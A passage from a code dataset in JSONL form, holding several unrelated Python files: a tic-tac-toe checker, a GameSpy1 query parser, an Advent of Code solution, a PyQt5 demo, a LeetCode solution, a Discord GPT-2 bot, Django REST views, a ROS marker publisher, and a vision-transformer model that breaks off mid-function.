data.columns if '_byrs' in col]\n data = self.byrs_count(data, train_data, col_list=byr_cols)\n all_data.append(data)\n except:\n print('%s 仓 %s 品类特征制造异常!', str(wh_id), str(self.cat1_id))\n continue\n return pd.concat(all_data)\n","repo_name":"Vinson1021/learngit","sub_path":"PROM_MODEL/dependencies/algorithm/cat_model/cat1_common_derived_features.py","file_name":"cat1_common_derived_features.py","file_ext":"py","file_size_in_byte":39420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23383550261","text":"class GameStatus(object):\r\n X_WON = 0\r\n O_WON = 1\r\n DRAW = 2\r\n IN_PROGRESS = 3\r\n UNKNOWN = 4\r\n\r\n STATUS_MESSAGES = {\r\n X_WON: \"X won\",\r\n O_WON: \"O won\",\r\n DRAW: \"Draw\",\r\n IN_PROGRESS: \"Game has not completed\",\r\n }\r\n \r\nclass Symbols(object):\r\n X_SYMB = 'X'\r\n O_SYMB = 'O'\r\n JOKER = 'T'\r\n EMPTY = '.'\r\n\r\nclass GameBoard(object):\r\n '''\r\n @input: board_content - a list of strings, each representing a row in the board.\r\n '''\r\n def __init__(self, board_content):\r\n self._rows = board_content\r\n self._cols = [''.join(x) for x in list(zip(*board_content))]\r\n self._status = GameStatus.UNKNOWN\r\n \r\n def determine_status(self,):\r\n self._status = GameStatus.DRAW\r\n # generating the diagonal\r\n diag1 = [''.join(self._rows[i][i] for i in range(len(self._rows)))]\r\n diag_2_indexes = list(zip(range(len(self._rows)-1, -1, -1), range(len(self._cols))))\r\n diag2 = [''.join(self._rows[i][j] for i,j in diag_2_indexes)]\r\n for element in self._rows + self._cols + diag1 + diag2:\r\n #import pdb\r\n #pdb.set_trace()\r\n first = element[0] if element[0] != Symbols.JOKER else element[1]\r\n found = True\r\n for symbol in element:\r\n if symbol == Symbols.EMPTY:\r\n self._status = GameStatus.IN_PROGRESS\r\n found = False\r\n break\r\n elif symbol != first and symbol != Symbols.JOKER:\r\n found = False\r\n break\r\n if found:\r\n if first == Symbols.X_SYMB:\r\n self._status = GameStatus.X_WON\r\n if first == Symbols.O_SYMB:\r\n self._status = GameStatus.O_WON\r\n return\r\n \r\n def get_game_status_message(self,):\r\n if self._status == GameStatus.UNKNOWN:\r\n self.determine_status()\r\n return GameStatus.STATUS_MESSAGES[self._status]","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/2878.py","file_name":"2878.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12637134702","text":"# coding: utf-8\nfrom __future__ import unicode_literals\nimport re\nfrom collections import OrderedDict\n\nfrom .. import Server as BaseServer\nfrom ..exceptions import ResponseIncomplete, ResponseMalformed\n\n\nclass Server(BaseServer):\n packets = {\n 'status': b'\\\\status\\\\',\n }\n parsers = (\n 'parse_packets',\n 'format_packets',\n )\n formatters = (\n 'format_response',\n )\n\n def parse_packets(self, packets):\n \"\"\"\n Parse and sort packets received in a response.\n\n :param packets: List of received packets\n :type packets: list\n :return: List of packets sorted in the original order\n :type return: list\n\n :raises ResponseIncomplete: if not enough packets\n \"\"\"\n packets, count = self._sort_packets(packets)\n # check the packet length\n if not count or count > len(packets):\n raise ResponseIncomplete(\n 'expected length of {} does not match the actual length {}'.format(count, len(packets))\n )\n return packets\n\n def format_packets(self, packets):\n \"\"\"\n Attempt to sort packets in the original order and parse their contents.\n\n :param packets: List of packets' contents\n :type packets: list\n :return: List of params\n :type return: list\n \"\"\"\n return self._parse_params(u''.join(packets))\n\n def format_response(self, response):\n \"\"\"\n Turn a formatted response data into an ordered dict.\n\n :param response: Formatted response\n :type response: tuple\n :return: Response dict\n :type return: collections.OrderedDict\n \"\"\"\n return OrderedDict(response)\n\n def _sort_packets(self, packets):\n count = None\n is_final = False\n numbered = {}\n for data in packets:\n data = self._decode(data)\n id = None\n for param, value in self._parse_params(data):\n if id is None and param in ('statusresponse', 'queryid'):\n # \\statusresponse\\1 or \\queryid\\1\n try:\n # attempt to read the next piece of data\n id = int(value)\n except IndexError:\n raise ResponseMalformed('invalid queryid')\n # \\queryid\\gs1\n except ValueError:\n id = 1\n else:\n # statusresponse is zero based\n id += (param == 'statusresponse')\n # this is the final packet\n elif param == 'final':\n is_final = True\n if is_final:\n count = id\n if id is None:\n raise ResponseMalformed('failed to read packet id')\n numbered[id] = self._fix_packet_contents(data)\n # sort packets by their ids\n return [value for key, value in sorted(numbered.items())], count\n\n def _parse_params(self, data):\n \"\"\"\n Split a response into a list of params.\n\n :param data: Response contents\n :type data: unicode\n :return: List of (key, value) param tuples\n :type return: list\n \"\"\"\n params = []\n split = data.split('\\\\')\n for i, key in enumerate(split):\n # skip values\n if not i % 2:\n continue\n # fetch the value\n try:\n value = split[i + 1]\n except IndexError:\n pass\n else:\n params.append((key, value))\n return params\n\n def _fix_packet_contents(self, data):\n \"\"\"\n Remove standard non compliant headers from packet contents.\n\n :param data: Packet contents\n :type data: unicode\n :return: Packet contents\n :type return: unicode\n \"\"\"\n return re.sub(r'(?:^\\\\statusresponse\\\\\\d+|\\\\eof\\\\$)', '', data)\n\n def _decode(self, data):\n \"\"\"\n Decode a piece of data into a unicode string.\n\n :param data: Data\n :return: Unicode string\n \"\"\"\n try:\n return data.decode('utf-8', errors='ignore')\n except (AttributeError, UnicodeDecodeError):\n return self._decode(str(data))\n","repo_name":"sergeii/python-serverquery","sub_path":"serverquery/protocol/gamespy1.py","file_name":"gamespy1.py","file_ext":"py","file_size_in_byte":4325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24760687571","text":"def compute_priorities(rucksack):\n element = set(rucksack[0]) & set(rucksack[1]) & set(rucksack[2])\n num = ord(element.pop())\n if num > 96:\n return num - 96\n else:\n return num - 38\n\n\nwith open('input.txt', 'r') as input:\n data = input.read().split('\\n')\n number_of_groups = int(len(data)/3)\n grouped_data = [data[i*3:i*3+3] for i in range(number_of_groups)]\n result = map(compute_priorities, grouped_data)\n","repo_name":"WiebkeFr/advent-of-code-2022","sub_path":"day-03/part-02.py","file_name":"part-02.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6224866092","text":"from PyQt5.Qt import *\nimport sys\n\n\n\n\napp = QApplication(sys.argv)\nwindow = QWidget()\nwindow.resize(500, 500)\nman = QRadioButton('男', window)\nman.move(0, 30)\nwomen = QRadioButton('女', window)\n\nyes = QRadioButton('yes', window)\nyes.move(50,0)\nno = QRadioButton('no', window)\nno.move(50,30)\n\n'''\n设置按钮组,将man与women放入同一个按钮组中,就不会与yes与no互斥\n'''\nsex_group = QButtonGroup(window)\nsex_group.addButton(man)\nsex_group.addButton(women)\n\n'''\n设置按钮组,将yes与wno放入同一个按钮组中,就不会与man与women互斥\n'''\nanswer_group = QButtonGroup(window)\nanswer_group.addButton(yes)\nanswer_group.addButton(no)\n\nwindow.show()\nsys.exit(app.exec())","repo_name":"ywkangkai/PythonGUI","sub_path":"GUI/按钮类型/单选按钮/设置按钮组,多组单选按钮互不影响.py","file_name":"设置按钮组,多组单选按钮互不影响.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39499762471","text":"# https://leetcode.com/contest/weekly-contest-118/problems/powerful-integers/\n\nclass Solution(object):\n def powerfulIntegers(self, x, y, bound):\n \"\"\"\n :type x: int\n :type y: int\n :type bound: int\n :rtype: List[int]\n \"\"\"\n # x or y = 1\n # duplicate\n nxs, nx = [], 1\n while nx < bound:\n nxs.append(nx)\n if x == 1:\n break\n nx *= x\n res, ny = set(), 1\n while ny < bound:\n for nx in nxs:\n if nx + ny > bound:\n break\n res.add(nx + ny)\n if y == 1:\n break\n ny *= y\n return list(res)\n \n","repo_name":"jwyx3/practices","sub_path":"leetcode/array/powerful-integers.py","file_name":"powerful-integers.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2478761204","text":"import configparser\n\nimport discord\n\nfrom discord_bot.commands.help_command import HelpCommand\nfrom discord_bot.commands.story_command import StoryCommand\nfrom discord_bot.commands.video_search_command import VideoSearchCommand\nfrom discord_bot.commands.write_command import WriteCommand\nfrom discord_bot.commands.chat_command import ChatCommand\nfrom discord_bot.keep_alive import keep_alive\n\nfrom generation.generate import Generate\n\nclient = discord.Client()\ngenerate = Generate()\n# load discord bot configs\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\ndiscord_config = config['discord']\ndebug_mode = discord_config.getboolean('debug')\ngame_playing_status = discord_config['game_playing_status']\n\n# prepare command handlers\nwrite_command = WriteCommand(client, config, generate)\nstory_command = StoryCommand(client, config)\nvideo_search_command = VideoSearchCommand(client, config)\nchat_command = ChatCommand(client, config, generate)\n\navailable_commands = [write_command, story_command, video_search_command]\nhelp_command = HelpCommand(client, available_commands)\n\n\n# bot ready event handler\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n if debug_mode:\n print('DEBUG MODE ENABLED')\n # set bot status\n await client.change_presence(activity=discord.Game(game_playing_status))\n\n\n# message event handler\n@client.event\nasync def on_message(message):\n # if the message is from the bot itself, skip it\n if message.author == client.user:\n return\n\n # if bot is set to debug mode,\n # and the message is not from one of the debug channels defined in the config file, skip it\n if debug_mode:\n # channel ids are integers\n debug_channel_ids = [int(s) for s in discord_config['debug_channel_ids'].split(',')]\n if message.channel.id not in debug_channel_ids:\n return\n\n # video search command\n # if the message is from the designated channel for video searching\n if message.channel.id in video_search_command.get_allowed_channel_ids():\n video_search_command.execute(message)\n\n # story command\n if message.content.startswith(story_command.get_command_prefix()):\n story_command.execute(message)\n\n # write command\n elif message.content.startswith(write_command.get_command_prefix()):\n write_command.execute(message)\n\n # message was sent in the chat channels\n elif message.channel.id in chat_command.get_allowed_channel_ids():\n chat_command.execute(message)\n\n # display the help message\n elif message.content.startswith(help_command.get_command_prefix()):\n help_command.execute(message)\n\nkeep_alive()\n\nclient.run(discord_config['key'])\n","repo_name":"czjyyds/gpt2-story-generator","sub_path":"src/discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"12497203588","text":"from rest_framework import status\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.decorators import api_view, permission_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.authentication import TokenAuthentication\r\nfrom rest_framework.pagination import PageNumberPagination\r\nfrom rest_framework.generics import ListAPIView\r\nfrom rest_framework.filters import SearchFilter, OrderingFilter\r\nfrom expose.models import Expose\r\nfrom expose.api.serializers import ExposeSerializer, ExposeCreateSerializer, ExposeUpdateSerializer\r\nfrom django.utils.translation import ugettext_lazy as _\r\nimport logging\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n@api_view(['GET', ])\r\n@permission_classes((IsAuthenticated,))\r\ndef api_detail_expose_view(request, slug):\r\n try:\r\n expose = Expose.objects.get(slug=slug)\r\n except Expose.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'GET':\r\n serializer = ExposeSerializer(expose)\r\n return Response(serializer.data)\r\n\r\n\r\n@api_view(['PUT', ])\r\n@permission_classes((IsAuthenticated,))\r\ndef api_update_expose_view(request, slug):\r\n try:\r\n expose = Expose.objects.get(slug=slug)\r\n except Expose.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'PUT':\r\n serializer = ExposeUpdateSerializer(expose, data=request.data, partial=True)\r\n data = {}\r\n if serializer.is_valid():\r\n serializer.save()\r\n data['response'] = expose.pk\r\n data['title'] = expose.title\r\n data['body'] = expose.body\r\n data['slug'] = expose.slug\r\n data['date_updated'] = expose.date_updated\r\n image_url = str(request.build_absolute_uri(expose.image.url))\r\n if \"?\" in image_url:\r\n image_url = image_url[:image_url.rfind(\"?\")]\r\n data['image'] = image_url\r\n data['exposeunit'] = expose.exposeunit.name\r\n return Response(data=data)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n@api_view(['DELETE', ])\r\n@permission_classes((IsAuthenticated,))\r\ndef api_delete_expose_view(request, slug):\r\n try:\r\n expose = Expose.objects.get(slug=slug)\r\n except Expose.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'DELETE':\r\n operation = expose.delete()\r\n data = {}\r\n if operation:\r\n data['response'] = _(\"response.success\")\r\n return Response(data=data)\r\n\r\n\r\n@api_view(['POST'])\r\n@permission_classes((IsAuthenticated,))\r\ndef api_create_expose_view(request):\r\n if request.method == 'POST':\r\n\r\n data = request.data\r\n serializer = ExposeCreateSerializer(data=data)\r\n data = {}\r\n\r\n if serializer.is_valid():\r\n expose = serializer.save()\r\n data['response'] = _(\"response.success\")\r\n data['pk'] = expose.pk\r\n data['title'] = expose.title\r\n data['body'] = expose.body\r\n data['slug'] = expose.slug\r\n data['date_updated'] = expose.date_updated\r\n image_url = str(request.build_absolute_uri(expose.image.url))\r\n if \"?\" in image_url:\r\n image_url = image_url[:image_url.rfind(\"?\")]\r\n data['image'] = image_url\r\n data['exposeunit'] = expose.exposeunit.name\r\n return Response(data=data)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass ApiExposeListView(ListAPIView):\r\n queryset = Expose.objects.all()\r\n serializer_class = ExposeSerializer\r\n authentication_classes = (TokenAuthentication,)\r\n permission_classes = (IsAuthenticated,)\r\n pagination_class = PageNumberPagination\r\n filter_backends = (SearchFilter, OrderingFilter)\r\n search_fields = ('title', 'body', 'exposeunit__name')\r\n","repo_name":"Am-Coder/Brainonet","sub_path":"expose/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21098309056","text":"class Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n if len(s) != len(t):\n return False\n \n d1, d2 = {}, {}\n \n for letter in s:\n d1[letter] = d1.get(letter, 0) + 1\n \n for letter in t:\n d2[letter] = d2.get(letter, 0) + 1\n \n return (d1 == d2)\n ","repo_name":"bharathithal/leetCodeSubmissions","sub_path":"242-valid-anagram/242-valid-anagram.py","file_name":"242-valid-anagram.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17379212024","text":"#!/usr/bin/env python\n\n# ROS data types\nfrom visualization_msgs.msg import Marker\n# ROS Libraries\nimport rospy\nimport tf\n\n\nif __name__ == '__main__':\n\trospy.init_node('marker_pub')\n\tpub = rospy.Publisher(\"visualization_marker\", Marker)\n\trate = rospy.Rate(10)\n\n\twhile not rospy.is_shutdown():\n\t\tmark \t\t\t\t\t\t= Marker()\n\t\tmark.header.frame_id \t\t= \"base_link\"\n\t\tmark.header.stamp \t\t\t= rospy.Time.now()\n\t\tmark.ns \t\t\t\t\t= \"my_namespace\"\n\t\tmark.id \t\t\t\t\t= 0\n\t\tmark.type \t\t\t\t\t= 1\n\t\tmark.action \t\t\t\t= 0\n\t\tmark.pose.position.x\t\t= 4\n\t\tmark.pose.position.y \t\t= 0\n\t\tmark.pose.position.z \t\t= 0\n\t\tmark.pose.orientation.x \t= 0.0\n\t\tmark.pose.orientation.y \t= 0.0\n\t\tmark.pose.orientation.z \t= 0.0\n\t\tmark.pose.orientation.w \t= 1.0\n\t\tmark.scale.x \t\t\t\t= 0.1\n\t\tmark.scale.y \t\t\t\t= 9.14\n\t\tmark.scale.z \t\t\t\t= 0.1\n\t\tmark.color.a \t\t\t\t= 1.0\n\t\tmark.color.r \t\t\t\t= 0.0\n\t\tmark.color.g \t\t\t\t= 1.0\n\t\tmark.color.b \t\t\t\t= 0.0\n\n\t\tpub.publish(mark)\n\t\trate.sleep()","repo_name":"OSUrobotics/cargo_align","sub_path":"src/marker_pub.py","file_name":"marker_pub.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43480136635","text":"import torch\nimport torch.nn as nn\nfrom functools import partial\nfrom einops import rearrange, repeat\nimport torch.nn.functional as nnf\n\nfrom torchvision.utils import save_image, make_grid\nimport numpy as np\nimport cv2\n\nimport random\nrandom.seed(123)\n\nfrom timm.models.vision_transformer import VisionTransformer, _cfg\nfrom timm.models.registry import register_model\nfrom timm.models.layers import trunc_normal_, helpers, DropPath\nfrom timm.models.resnet import Bottleneck, ResNet\nfrom timm.models.resnet import _cfg as _cfg_resnet\nfrom timm.models.helpers import build_model_with_cfg\n\n__all__ = [\n 'deit_tiny_patch16_224', 'deit_small_patch16_224', 'deit_base_patch16_224',\n 'deit_tiny_distilled_patch16_224', 'deit_small_distilled_patch16_224',\n 'deit_base_distilled_patch16_224', 'deit_base_patch16_384',\n 'deit_base_distilled_patch16_384',\n]\n\ndef TokensCutOff(x, tua = 0.4):\n CLS, DIS = x[:, 0, :].unsqueeze(1), x[:, 1, :].unsqueeze(1)\n tokens = x[:, 2:, :]\n B, N, C = tokens.shape\n\n mask = torch.ones(B, N, requires_grad=False).cuda()\n prob = torch.rand(B, N, requires_grad=False).cuda()\n mask = torch.where(prob > tua, mask, torch.full_like(mask, 1e-8))\n TokenMask = mask.view(B, N, 1).expand_as(tokens)\n\n x = tokens * TokenMask\n x = torch.cat((CLS, DIS, x), dim=1)\n return x\n\ndef FeatureCutOff(x, tua = 0.4):\n CLS, DIS = x[:, 0, :].unsqueeze(1), x[:, 1, :].unsqueeze(1)\n tokens = x[:, 2:, :]\n B, N, C = tokens.shape\n\n mask = torch.ones(B, C, requires_grad=False).cuda()\n prob = torch.rand(B, C, requires_grad=False).cuda()\n mask = torch.where(prob > tua, mask, torch.full_like(mask, 1e-8))\n TokenMask = mask.view(B, 1, C).expand_as(tokens)\n \n x = tokens * TokenMask\n x = torch.cat((CLS, DIS, x), dim=1)\n return x\n\ndef shuffle_unit(features, shift, group, begin=0, return_idex=False):\n batchsize = features.size(0)\n dim = features.size(-1)\n labels = torch.arange(0, features.size(-2), 1, device=features.device).expand(batchsize, -1)\n\n # Shift Operation\n feature_random = torch.cat([features[:, begin-1+shift:], features[:, begin:begin-1+shift]], dim=1)\n labels = torch.cat([labels[:, begin-1+shift:], labels[:, begin:begin-1+shift]], dim=1)\n x = feature_random\n\n # Patch Shuffle Operation\n x = x.view(batchsize, group, -1, dim)\n x = torch.transpose(x, 1, 2).contiguous()\n x = x.view(batchsize, -1, dim)\n\n labels = labels.view(batchsize, group, -1, 1)\n labels = torch.transpose(labels, 1, 2).contiguous()\n labels = labels.view(batchsize, -1)\n\n if return_idex:\n return x, labels\n return x\n\ndef random_shuffle_unit(features, return_idex=False, batch_premutation=False, sort_label=None):\n if sort_label:\n B, N, C = features.shape\n labels = []\n perms_idx = []\n for b in range(B):\n perm_idx = random.choice(list(sort_label.keys()))\n label = sort_label[perm_idx]\n perms_idx.append(perm_idx + b * N)\n labels.append(label)\n perms_idx = torch.cat(perms_idx)\n x = features.contiguous().view(-1, C)\n x = x[perms_idx, :]\n x = x.view(B, N, C)\n\n if return_idex:\n return x, torch.tensor(labels, device=features.device), perms_idx\n\n if batch_premutation:\n B, N, C = features.shape\n labels = torch.arange(0, N, 1, device=features.device)\n # labels = (labels - labels.min())/(labels.max() - labels.min()) + 1e-8\n labels = labels.expand(B, -1)\n\n # perturbation = torch.rand([B, N], device=features.device) - torch.rand([B, N], device=features.device)\n # labels = labels + perturbation\n\n index = torch.cat([torch.randperm(N) + b * N for b in range(B)], dim=0)\n x = features.contiguous().view(-1, C)\n x = x[index, :]\n x = x.view(B, N, C)\n labels = labels.contiguous().view(-1)[index].view(B, -1)\n\n else:\n batchsize = features.size(0)\n dim = features.size(-1)\n num_patch = features.size(-2)\n\n labels = torch.arange(0, features.size(-2), 1, device=features.device)\n # labels = (labels - labels.min())/(labels.max() - labels.min()) + 1e-8\n labels = labels.expand(batchsize, -1)\n\n # perturbation = torch.rand([B, N]) - torch.rand([B, N])\n # labels = labels + perturbation\n\n index = torch.randperm(features.size(-2))\n labels = labels[:, index]\n x = features[:, index, :]\n\n if return_idex:\n return x, labels, index\n return x\n\nclass Attention(nn.Module):\n def __init__(self, dim, num_heads=8, qkv_bias=False, attn_drop=0., proj_drop=0.):\n super().__init__()\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = head_dim ** -0.5\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n self.attn = None\n\n def forward(self, x):\n xori = x\n B, N, C = x.shape\n\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n q, k, v = qkv.unbind(0) # make torchscript happy (cannot use tensor as tuple)\n\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n self.attn = attn\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n def get_attn(self):\n return self.attn\n\n\nclass Mlp(nn.Module):\n \"\"\" MLP as used in Vision Transformer, MLP-Mixer and related networks\n \"\"\"\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n drop_probs = helpers.to_2tuple(drop)\n\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.drop1 = nn.Dropout(drop_probs[0])\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop2 = nn.Dropout(drop_probs[1])\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop1(x)\n x = self.fc2(x)\n x = self.drop2(x)\n return x\n\nclass Block(nn.Module):\n\n def __init__(self, args, dim, num_heads, mlp_ratio=4., qkv_bias=False, drop=0., attn_drop=0.,\n drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm):\n super().__init__()\n self.norm1 = norm_layer(dim)\n self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, attn_drop=attn_drop, proj_drop=drop)\n # NOTE: drop path for stochastic depth, we shall see if this is better than dropout here\n self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)\n\n def forward(self, x):\n x = x + self.drop_path(self.attn(self.norm1(x)))\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\n\nclass DistilledVisionTransformer(VisionTransformer):\n def __init__(self, *args, **kwargs):\n self._args = kwargs['args']\n del kwargs['args']\n\n super().__init__(*args, **kwargs)\n\n self.dist_token = nn.Parameter(torch.zeros(1, 1, self.embed_dim))\n num_patches = self.patch_embed.num_patches\n self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 2, self.embed_dim))\n self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if self.num_classes > 0 else nn.Identity()\n\n # dpr = [x.item() for x in torch.linspace(0, kwargs['drop_path_rate'], kwargs['depth'])] # stochastic depth decay rule\n # self.blocks = nn.Sequential(*[\n # Block(\n # dim=kwargs['embed_dim'], num_heads=kwargs['num_heads'], mlp_ratio=kwargs['mlp_ratio'], qkv_bias=kwargs['qkv_bias'], drop=kwargs['drop_rate'],\n # attn_drop=kwargs['attn_drop_rate'], drop_path=dpr[i], norm_layer=kwargs['norm_layer'], act_layer=kwargs['act_layer'])\n # for i in range(kwargs['depth'])])\n\n trunc_normal_(self.dist_token, std=.02)\n trunc_normal_(self.pos_embed, std=.02)\n self.head_dist.apply(self._init_weights)\n\n self.shuffle = self._args.shuffle\n self.Token_cutoff = self._args.Token_cutoff\n self.tua_token = self._args.tua_token\n\n self.Feature_cutoff = self._args.Feature_cutoff\n self.tua_feature = self._args.tua_feature\n\n def forward_features(self, x):\n # taken from https://github.com/rwightman/pytorch-image-models/blob/master/timm/models/vision_transformer.py\n # with slight modifications to add the dist_token\n B = x.shape[0]\n x = self.patch_embed(x)\n cls_tokens = self.cls_token.expand(B, -1, -1) # stole cls_tokens impl from Phil Wang, thanks\n dist_token = self.dist_token.expand(B, -1, -1)\n x = torch.cat((cls_tokens, dist_token, x), dim=1)\n\n x = x + self.pos_embed\n x = self.pos_drop(x)\n\n if self.shuffle and self.training:\n CLS, DIS = x[:, 0, :].unsqueeze(1), x[:, 1, :].unsqueeze(1)\n x = shuffle_unit(x[:, 2:, :], shift=8, group=2)\n x = torch.cat((CLS, DIS, x), dim=1)\n\n for blk in self.blocks:\n x = blk(x)\n if self.Token_cutoff and self.training:\n x = TokensCutOff(x, self.tua_token)\n if self.Feature_cutoff and self.training:\n x = FeatureCutOff(x, self.tua_feature)\n \n x = self.norm(x)\n return x[:, 0], x[:, 1]\n\n def forward(self, x):\n x, x_dist = self.forward_features(x)\n x = self.head(x)\n x_dist = self.head_dist(x_dist)\n if self.training:\n return x, x_dist\n else:\n # during inference, return the average of both classifier predictions\n return (x + x_dist) / 2\n\nclass Video2Image(nn.Module):\n def __init__(self, inp_channel=16):\n super(Video2Image, self).__init__()\n # self.MLP = nn.Sequential(\n # # input: [B, N, C]\n # nn.Linear(C, C//2),\n # nn.ReLU(),\n # nn.Linear(C//2, C)\n # )\n self.channel1 = nn.Conv2d(inp_channel, 1, kernel_size=1, stride=1, padding=0, bias=False)\n self.channel2 = nn.Conv2d(inp_channel, 1, kernel_size=1, stride=1, padding=0, bias=False)\n self.channel3 = nn.Conv2d(inp_channel, 1, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn = nn.BatchNorm2d(3)\n self.relu = nn.ReLU(inplace=False)\n\n self.channel1_reverse = nn.Conv2d(1, inp_channel, kernel_size=1, stride=1, padding=0, bias=False)\n self.channel2_reverse = nn.Conv2d(1, inp_channel, kernel_size=1, stride=1, padding=0, bias=False)\n self.channel3_reverse = nn.Conv2d(1, inp_channel, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn_reverse = nn.BatchNorm3d(3)\n self.relu_reverse = nn.ReLU(inplace=False)\n\n self.compressed = None\n \n def get_compressed_img(self):\n return self.compressed\n\n def forward(self, x):\n B, C, T, H, W = x.shape\n # x = rearrange(x, 'b c t h w -> (b c) t h w)')\n x_channel1 = self.channel1(x[:, 0, :, :, :])\n x_channel2 = self.channel2(x[:, 1, :, :, :])\n x_channel3 = self.channel3(x[:, 2, :, :, :])\n x = torch.cat((x_channel1, x_channel2, x_channel3), dim=1)\n x = self.relu(self.bn(x))\n self.compressed = x\n \n x_channel1_reverse = self.channel1_reverse(x[:, 0, :, :].unsqueeze(1))\n x_channel2_reverse = self.channel2_reverse(x[:, 1, :, :].unsqueeze(1))\n x_channel3_reverse = self.channel3_reverse(x[:, 2, :, :].unsqueeze(1))\n x_reverse = torch.cat((x_channel1_reverse.unsqueeze(1), x_channel2_reverse.unsqueeze(1), x_channel3_reverse.unsqueeze(1)), dim=1)\n x_reverse = self.relu_reverse(self.bn_reverse(x_reverse))\n return x, x_reverse\n\nclass VisionTransformer(VisionTransformer):\n def __init__(self, *args, **kwargs):\n self._args = kwargs['args']\n del kwargs['args']\n super().__init__(*args, **kwargs)\n\n dpr = [x.item() for x in torch.linspace(0, kwargs['drop_path_rate'], kwargs['depth'])] # stochastic depth decay rule\n self.blocks = nn.Sequential(*[\n Block(\n self._args, dim=kwargs['embed_dim'], num_heads=kwargs['num_heads'], mlp_ratio=kwargs['mlp_ratio'], qkv_bias=kwargs['qkv_bias'], drop=kwargs['drop_rate'],\n drop_path=dpr[i], norm_layer=kwargs['norm_layer'])\n for i in range(kwargs['depth'])])\n \n num_patches = self.patch_embed.num_patches\n self.pos_embed = nn.Parameter(torch.zeros(1, num_patches+1, self.embed_dim))\n trunc_normal_(self.pos_embed, std=.02)\n\n self.video2Img = Video2Image(self._args.sample_duration)\n \n def get_cls_token(self):\n return self.CLSToken\n def get_patch_token(self):\n return self.PatchToken\n\n def forward_features(self, x):\n x = self.patch_embed(x)\n cls_token = self.cls_token.expand(x.shape[0], -1, -1) # stole cls_tokens impl from Phil Wang, thanks\n x = torch.cat((cls_token, x), dim=1)\n x = self.pos_drop(x + self.pos_embed)\n\n for blk in self.blocks:\n x = blk(x)\n x = self.norm(x)\n self.PatchToken = x[:, 1:]\n\n return self.pre_logits(x[:, 0])\n \n def forward(self, x): \n # x.size: torch.Size([16, 3, 16, 224, 224])\n x, x_reverse = self.video2Img(x)\n x = self.forward_features(x)\n self.CLSToken = x\n x = self.head(x)\n return x, x_reverse\n\n\n@register_model\ndef deit_tiny_patch16_224(pretrained=False, **kwargs):\n model = VisionTransformer(\n patch_size=16, embed_dim=192, depth=12, num_heads=3, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_tiny_patch16_224-a1311bcf.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return 